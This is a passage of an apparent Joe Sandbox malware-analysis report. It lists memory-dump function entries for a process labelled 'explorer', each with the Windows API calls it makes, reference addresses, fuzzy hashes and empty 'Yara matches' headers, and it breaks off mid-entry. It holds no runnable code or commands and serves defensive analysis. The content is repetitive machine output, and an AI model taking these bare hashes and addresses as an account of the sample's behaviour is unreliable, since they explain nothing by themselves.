                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocLocal
                          • String ID:
                          • API String ID: 2140729754-0
                          • Opcode ID: 5f8aa4ab87cad69a3514eba26cde1d022795cdbff8f0086349863da9b0deaea0
                          • Instruction ID: 1b1303424db48399e3ee2a11784896e29e3dc415a61a3a508c795779e0e60557
                          • Opcode Fuzzy Hash: 5f8aa4ab87cad69a3514eba26cde1d022795cdbff8f0086349863da9b0deaea0
                          • Instruction Fuzzy Hash: 5981CA76619A84CAC768CB19E48476ABBE1F7C8B95F504125EBCEC7B28DB7CC4458F00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc
                          • String ID:
                          • API String ID: 3098330729-0
                          • Opcode ID: 95c7c02cb5a9c3c0012149c6f5b132b71bb915bcad97683c1d37726ad4c63fb8
                          • Instruction ID: 212903bb007506be579d2453d147dea973817b16daf561ef316732fcf1c670cc
                          • Opcode Fuzzy Hash: 95c7c02cb5a9c3c0012149c6f5b132b71bb915bcad97683c1d37726ad4c63fb8
                          • Instruction Fuzzy Hash: A011A47A119B4486D728AF55F48439ABBA1F7C8798F440629EB8E43B68DF7CC585CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize$CreateInstanceSecurityUninitialize
                          • String ID:
                          • API String ID: 374467530-0
                          • Opcode ID: 01f4831329a5563387f89c4824883f088de12b8d18de76738e488f0d589c6ac1
                          • Instruction ID: 907812c4ec16dac64fabf1bee2466978c5fc67341fb0a4bea29caba271c888ba
                          • Opcode Fuzzy Hash: 01f4831329a5563387f89c4824883f088de12b8d18de76738e488f0d589c6ac1
                          • Instruction Fuzzy Hash: 4DA1F636209AC995DBB4DB11E8983DFB7A1F3D8794F804126DA8D43BA8DF78C549CB40
                          APIs
                            • Part of subcall function 011B0AC0: LocalAlloc.KERNEL32 ref: 011B0B2C
                          • VirtualFree.KERNEL32 ref: 011B1222
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFreeLocalVirtual
                          • String ID:
                          • API String ID: 3333721195-0
                          • Opcode ID: 76c2b0fe22ffe321a275c67454cdda88111c855abae9c27ec7195a6d11e406fb
                          • Instruction ID: 46a0766699e2b31e852c094fffe60702100a50efa8a29586ae43d87ab7080937
                          • Opcode Fuzzy Hash: 76c2b0fe22ffe321a275c67454cdda88111c855abae9c27ec7195a6d11e406fb
                          • Instruction Fuzzy Hash: 58A1A836619B88C6DB64CB59F4907AAB7A0F7C8B94F514115EACE83B28DF3CC454CB01
                          APIs
                          • _errno.LIBCMT ref: 011C2106
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C2111
                          • DecodePointer.KERNEL32(?,?,?,?,?,011C0EAC,?,?,?,?,011BC4FE,?,?,?,?,011BC523), ref: 011C21C0
                          • _lock.LIBCMT ref: 011C21EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                          • String ID:
                          • API String ID: 27599310-0
                          • Opcode ID: eaaec147ed81c0c0dc5c3833a3db641d4c97e0906736fbf4571d3f785fcdefcf
                          • Instruction ID: 86b1158b0f4b98ccf6b42cbd1f09187ddf195d24951fc65303914910ae754c06
                          • Opcode Fuzzy Hash: eaaec147ed81c0c0dc5c3833a3db641d4c97e0906736fbf4571d3f785fcdefcf
                          • Instruction Fuzzy Hash: B951C33A60874097EB2DDF29E8803BA7B62F7E5F54F15452EDB9A43728DB38C542C201
                          APIs
                            • Part of subcall function 011B951C: _getptd.LIBCMT ref: 011B952E
                          • _errno.LIBCMT ref: 011C3F4A
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C3F54
                          • _errno.LIBCMT ref: 011C3F78
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C3F82
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo$_getptd
                          • String ID:
                          • API String ID: 1297830140-0
                          • Opcode ID: cf02349e387d3e4dfecf3681c0094f0a920e4057bdb0d520093da4d2c6150caa
                          • Instruction ID: 65a1a1c685e55d7de5cd2c7515e1f35bc18e50af0030cc01595667f88e6eebc7
                          • Opcode Fuzzy Hash: cf02349e387d3e4dfecf3681c0094f0a920e4057bdb0d520093da4d2c6150caa
                          • Instruction Fuzzy Hash: 334113722187C286DB29DF29D1D42AE7BA0F7A4FD4F058129DB9A43B15CF38C456CB42
                          APIs
                            • Part of subcall function 011B8678: _getptd.LIBCMT ref: 011B867C
                          • _getptd.LIBCMT ref: 011BB177
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                          • _SetImageBase.LIBCMT ref: 011BB24A
                          • _getptd.LIBCMT ref: 011BB278
                          • _getptd.LIBCMT ref: 011BB286
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BaseImage_amsg_exit
                          • String ID:
                          • API String ID: 2306399499-0
                          • Opcode ID: 820a420128445b834781f5b02e45248ebb4483b0580a0986e614cad34156e6cf
                          • Instruction ID: 089d7860cd9b975172f05b05b3090caa28e26cd153f3238ef7805b27c9051967
                          • Opcode Fuzzy Hash: 820a420128445b834781f5b02e45248ebb4483b0580a0986e614cad34156e6cf
                          • Instruction Fuzzy Hash: 8931B433305A4285DA2DAB1AE4C02EDABA5FBA5FDDF558621CE5943B70DB38D482C344
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 888b41058b39ff49698322652d937c363c2f88c4d926ece529eddb611b94049f
                          • Instruction ID: beb9c96f049136cabad3f75c88887e48a080399c931c87a99e6979c77c19fa21
                          • Opcode Fuzzy Hash: 888b41058b39ff49698322652d937c363c2f88c4d926ece529eddb611b94049f
                          • Instruction Fuzzy Hash: 6A31A432201B00C1DA28CB19E8D53E9A7B1F7E8B09F95166ED65F467B0DF3DDA86C604
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: bd4f2e530ef6c833281bc831b4e698a4f9f1fd3fa1c855f339cada12b6746046
                          • Instruction ID: d818c5a6f880d72c1d946ca469214a9896302f2f3b7a1d595565560c12302bc2
                          • Opcode Fuzzy Hash: bd4f2e530ef6c833281bc831b4e698a4f9f1fd3fa1c855f339cada12b6746046
                          • Instruction Fuzzy Hash: 38319532201B00C1DA28CB19E8D53E9A7A1F7E8B09F95166ED65F467B0DF3DDA86C604
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                          • String ID:
                          • API String ID: 3044467104-0
                          • Opcode ID: 81ccbe93b8fc7bd16980f115d78441d3d5af4185a1ed9f96ba58278dc336bfb5
                          • Instruction ID: aa42db2ca95ef6643bc3354237ed789073272fa203de85142811fd94d617737c
                          • Opcode Fuzzy Hash: 81ccbe93b8fc7bd16980f115d78441d3d5af4185a1ed9f96ba58278dc336bfb5
                          • Instruction Fuzzy Hash: 8021B832159A84C6E73ADB18E4897DAB370F79C749F140215D2CA92A58CB7EC455CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                          • String ID:
                          • API String ID: 785092289-0
                          • Opcode ID: 7dd51d4a96154a47962f402dbd86dbbf85a6b52b987aef741ecd886394d83581
                          • Instruction ID: 20fb25355d1e119c807ff6e4dd84f7f4e19f7fe98668efebcd06be9cb02a5d93
                          • Opcode Fuzzy Hash: 7dd51d4a96154a47962f402dbd86dbbf85a6b52b987aef741ecd886394d83581
                          • Instruction Fuzzy Hash: 8721BA32159A80C6E73BDB18E8897DAB370F7DC749F140215D6CA96A58CB7EC455CF01
                          APIs
                          • _lock.LIBCMT ref: 011C29F8
                            • Part of subcall function 011C0C94: _amsg_exit.LIBCMT ref: 011C0CBE
                          • fclose.LIBCMT ref: 011C2A28
                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,011C0357), ref: 011C2A4C
                          • free.LIBCMT ref: 011C2A5D
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                          • String ID:
                          • API String ID: 594724896-0
                          • Opcode ID: aa6ca66c80873731f8a150e0b86dd53b8ef037a2e005e3ebe12fa3c1dbd2421b
                          • Instruction ID: 1bfb7aec2f355e10651e7c1b39c901f9a8250509a988cf8c3a2383f27c83dabf
                          • Opcode Fuzzy Hash: aa6ca66c80873731f8a150e0b86dd53b8ef037a2e005e3ebe12fa3c1dbd2421b
                          • Instruction Fuzzy Hash: AE115E76114A4186E6289B1DE48439CB760F7E4F88F154229DB9A437B4CF35C452C708
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit$_getptd_lockfree
                          • String ID:
                          • API String ID: 2148533958-0
                          • Opcode ID: 7d5ec1c694969eec4ffcdf5f24f7f7717c51fab83522bc8814469292a1c3f9b2
                          • Instruction ID: 43d8ac5138f7c6c13c8a0e2f006cc9411e980ddced7ee909f6307b6e4d69c912
                          • Opcode Fuzzy Hash: 7d5ec1c694969eec4ffcdf5f24f7f7717c51fab83522bc8814469292a1c3f9b2
                          • Instruction Fuzzy Hash: C1114536216B8086EFAD9B95E9807E97371F798B88F48407AEB5E03764DF38C054C710
                          APIs
                          • FlsFree.KERNEL32(?,?,?,?,011BAF69,?,?,00000000,011B994F), ref: 011BAC43
                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011BAF69), ref: 011C0B3F
                          • free.LIBCMT ref: 011C0B48
                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011BAF69), ref: 011C0B6F
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection$Freefree
                          • String ID:
                          • API String ID: 1250194111-0
                          • Opcode ID: 86697225af0ef29e84d7c3c26fe1ad1d26f00b65429faf76b737e405a28afc94
                          • Instruction ID: 6c274268e62b6ff2853ab336d84107eac767e9fa53a6a2195ec07a7c249c753d
                          • Opcode Fuzzy Hash: 86697225af0ef29e84d7c3c26fe1ad1d26f00b65429faf76b737e405a28afc94
                          • Instruction Fuzzy Hash: 09116539640A40C6EB1DDF19F8953987360F758FA8F5C0619FB5A072A5CB38C491C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd$_lock
                          • String ID:
                          • API String ID: 3670291111-0
                          • Opcode ID: 3e08b2e58fbf2c0528a6b76ba76d0d3e75f613e6b742c3ba148680e163a33f46
                          • Instruction ID: 2d58d4cb5de80c5e6427e467c3877f33d198bcff3feb4746dd7e092ff9d60f2f
                          • Opcode Fuzzy Hash: 3e08b2e58fbf2c0528a6b76ba76d0d3e75f613e6b742c3ba148680e163a33f46
                          • Instruction Fuzzy Hash: 5DF0F865713141C6FB1DAB65D880BEC2762EBA8B48F4D4239DA098B391DF2C8444C721
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: a8fae1981da01bcbb2a1c6d84720f61f8cd10c58edd704b4508c663120668e76
                          • Instruction ID: d0cd8d7fa154e2a3a6dc914eaf449be1b190e33422db320b5b29097a1bccc11a
                          • Opcode Fuzzy Hash: a8fae1981da01bcbb2a1c6d84720f61f8cd10c58edd704b4508c663120668e76
                          • Instruction Fuzzy Hash: 1DF07470601A0081FB1CAB56EC583D23260F794755F5A063DD62A46AF0CF7C86AFC340
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 8f51929405574940be7766fa86d43549159d96cfea42b17bcf3ff5e4809f7d9a
                          • Instruction ID: c6cec97e4a3845603700ac4d4b358c5eda88ac8b0c7dc82d9509437a0ac43f77
                          • Opcode Fuzzy Hash: 8f51929405574940be7766fa86d43549159d96cfea42b17bcf3ff5e4809f7d9a
                          • Instruction Fuzzy Hash: 6FF06274501A0481FB1CAB65EC583D57265F784765F5A067AD61B86AF0CF7C86EFC300
                          APIs
                          • _getptd.LIBCMT ref: 011BC0DC
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd
                          • String ID: csm$csm
                          • API String ID: 4217099735-3733052814
                          • Opcode ID: 3df88b8aebcde812e8943f6a934dd4efc34046fb34657283cbb5c52ec68e0694
                          • Instruction ID: 5f5f79975e70824590758a1eecd7de4e40a0d2c663c850ebf3c02c1dad1b1f63
                          • Opcode Fuzzy Hash: 3df88b8aebcde812e8943f6a934dd4efc34046fb34657283cbb5c52ec68e0694
                          • Instruction Fuzzy Hash: 3351AF32204681CADB3C8FAAD4C07AEBBA4F745B98F488115DF9D67B44CB38C491CB81
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                          • Instruction ID: ea788ff3afb3a11d274be3388203da6fac7767088dc8905295e0d732ce064f73
                          • Opcode Fuzzy Hash: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                          • Instruction Fuzzy Hash: E1214F72B10A64C9EB1ADF75E9C07DC3BB8AB14BACF544225EF1A1BA88DB348545C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: caa61915c6e2b0a0e6ed17b53c02f9c7a0b75dc161a265ff4afdc4f30caa483d
                          • Instruction ID: ec01b58352ba0250182bb5f7ea663d873aa800e5150de8f9f4c1c8979b3e25fc
                          • Opcode Fuzzy Hash: caa61915c6e2b0a0e6ed17b53c02f9c7a0b75dc161a265ff4afdc4f30caa483d
                          • Instruction Fuzzy Hash: 4721D477100644CADB298F6AD48429C3B75F368FADF8A2219EA4D0BF59CB75C890C785
                          APIs
                            • Part of subcall function 011B8AB0: _getptd.LIBCMT ref: 011B8ABD
                            • Part of subcall function 011B8AB0: _getptd.LIBCMT ref: 011B8AD0
                          • _getptd.LIBCMT ref: 011C7095
                          • _getptd.LIBCMT ref: 011C70A8
                          Strings
                          Memory Dump Source
